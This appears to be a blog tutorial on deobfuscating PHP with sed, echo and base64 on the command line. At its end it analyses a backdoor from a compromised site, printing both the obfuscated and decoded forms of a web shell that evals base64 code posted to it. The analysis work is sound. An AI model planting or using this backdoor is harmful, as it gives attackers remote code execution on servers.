
Command line PHP deobfuscation


Recently a customer asked me to debug their Joomla!/PHP site, which had developed interoperability problems over time for unknown reasons. The site used some commercial plugins whose vendor was long gone and unreachable and, worst of all, the plugins were all obfuscated. So even searching for a basic string shown on screen with an error, to understand what was going on, was not a straightforward exercise, and reading through the code was a mess.

Apart from restructuring the code logically, for example by adding intermediate variables or splitting variable assignments into several operations, the first and most annoying thing PHP obfuscators do is replace most characters in string values with their hexadecimal (\xXX) or octal (\XXX) escape sequences and strip all line feeds and code structure. Once you get rid of this, the code is still quite messy but, at least in the cases I analyzed, readable enough; it just needs a little more bookkeeping to follow the automatically named variables.

Getting rid of at least this confusing representation is quite straightforward on the command line with a few tricks.

The procedure is shown step by step for the sake of clarity; you can of course pipe multiple commands together (or combine the sed ones using sed's -e option) to get a single-shot operation.

As a first step, we translate the octal \XXX values in PHP notation into the \0XXX notation that the bash echo command understands:

sed 's/\\\([0-9]\)/\\0\1/g' file.php > step1.php
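To see what this substitution does, here is a small sketch that runs the same sed expression on a made-up sample line. The function name php_octal_to_echo and the sample string are illustrative assumptions, not part of the original plugin code.

```shell
# Hypothetical helper: same sed expression as above, reading from stdin.
php_octal_to_echo() {
  # Insert a 0 between a backslash and the digit that follows it.
  sed 's/\\\([0-9]\)/\\0\1/g'
}

# Sample input mixing octal and hexadecimal escapes (invented for illustration).
printf '%s\n' '$f = "\142\141\x73\145";' | php_octal_to_echo
# prints: $f = "\0142\0141\x73\0145";
```

Note that only the octal escapes change; the \x73 sequence is left alone because no digit follows its backslash directly. An escaped backslash followed by a digit would also be rewritten, so unusual inputs are worth checking by hand.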

Now we can use echo to interpret both the octal representation from the previous step and the hexadecimal \xXX values already present, since that format is the same in PHP and echo:

set -f
echo -e `cat step1.php` > step2.php
set +f

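Be aware that we disable (and at the end re-enable) bash filename expansion (globbing) with the set command, so that wildcard characters present in the file are not expanded. Because the command substitution is unquoted, runs of whitespace, including newlines, also collapse into single spaces.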

Now we put a newline after each curly bracket (function definitions and other blocks) so the code becomes a little more readable:

sed 's/[{}]/&\n/g' step2.php > step3.php

Next we can put a newline after each “;” character (the end of a statement in PHP) to make the code more readable still. Be aware that this may break mixed HTML/JS code in the PHP file. A better version (though probably not straightforward as a one-liner) would check that we are outside any quoted string and skip those occurrences. You can use the resulting file for reading and then, if needed, work on the file from the previous step to be sure the PHP didn’t get broken.

sed 's/;/&\n/g' step3.php > final.php
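The quote-aware variant mentioned above could be sketched with awk as follows. This is only a rough illustration: split_statements is a hypothetical helper name, and the script tracks just single and double quotes with backslash escapes, ignoring PHP comments, heredocs and inline HTML.

```shell
# Hypothetical helper: add a newline after each ";" that is outside a quoted string.
split_statements() {
  awk -v sq="'" '
  {
    n = length($0)
    for (i = 1; i <= n; i++) {
      c = substr($0, i, 1)
      printf "%s", c
      if (quote != "") {
        if (c == "\\") {
          # Copy the escaped character verbatim so an escaped quote
          # does not end the string.
          i++
          printf "%s", substr($0, i, 1)
        } else if (c == quote) {
          quote = ""          # closing quote reached
        }
      } else if (c == "\"" || c == sq) {
        quote = c             # opening quote, remember which kind
      } else if (c == ";" && i < n) {
        printf "\n"           # statement end outside any string
      }
    }
    printf "\n"
  }'
}

# Usage (file names as in the steps above):
#   split_statements < step3.php > final.php
```

The quote state is kept across input lines, so a string literal that spans several lines is still treated as one string.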

We now have a much more readable file than the one we started with. Sure, the source still contains only numerically named variables and piecemeal assignments, but compared to the starting point it’s now a breeze to go through (at least for the sources I had to analyze, which were files of about 150 KB each).

Another thing you’ll sometimes find in obfuscated PHP files, especially in PHP exploits and the like, is parts of strings encoded with base64, decoded on the fly with base64_decode and then, for example, passed to eval() to be executed. In that case you can use the base64 tool with the -d switch to decode them on the command line. As an example, here is code from a compromised site I noticed recently (the original had no newlines, but I added a few for the sake of clarity):

$_ = "CmlmKGlzc2V0KCRfUE9TVFsiY29kZSJdKSkKewogICAgZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsiY29kZSJdKSk7Cn0=";
$__ = "JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCRfKTsKZXZhbCgkY29kZSk7";
$___ ="\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";
eval($___($__));

After following the procedure in this article, it becomes:

$_ = "CmlmKGlzc2V0KCRfUE9TVFsiY29kZSJdKSkKewogICAgZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsiY29kZSJdKSk7Cn0=";
$__ = "JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCRfKTsKZXZhbCgkY29kZSk7";
$___ ="base64_decode";
eval($___($__));

Finally, $_ decodes to:

if(isset($_POST["code"]))
{
    eval(base64_decode($_POST["code"]));
}

and $__ decodes to:

$code = base64_decode($_);
eval($code);

To obtain the previous two results, just run this command (put the string to decode between the quotes):

echo "string" | base64 -d
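When a file holds several such strings, pasting them one at a time gets tedious. The sketch below pulls every double-quoted literal that looks like base64 out of a file and decodes each one. The helper name decode_b64_literals and the 16-character minimum are assumptions chosen for illustration; ordinary long alphanumeric strings will match too and decode to garbage.

```shell
# Hypothetical helper: decode every base64-looking double-quoted literal in a file.
decode_b64_literals() {
  # Assumed heuristic: at least 16 base64 characters plus optional "=" padding.
  grep -oE '"[A-Za-z0-9+/]{16,}={0,2}"' "$1" | tr -d '"' |
  while IFS= read -r literal; do
    printf '%s\n' "--- $literal"          # show which literal is being decoded
    printf '%s' "$literal" | base64 -d    # decode it
    printf '\n'
  done
}

# Usage (file name as in the steps above):
#   decode_b64_literals final.php
```

Decoding only prints the payload; nothing is executed, which is what you want when inspecting code from a compromised site.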

So any commands passed in the POST parameter code are covertly executed on the system.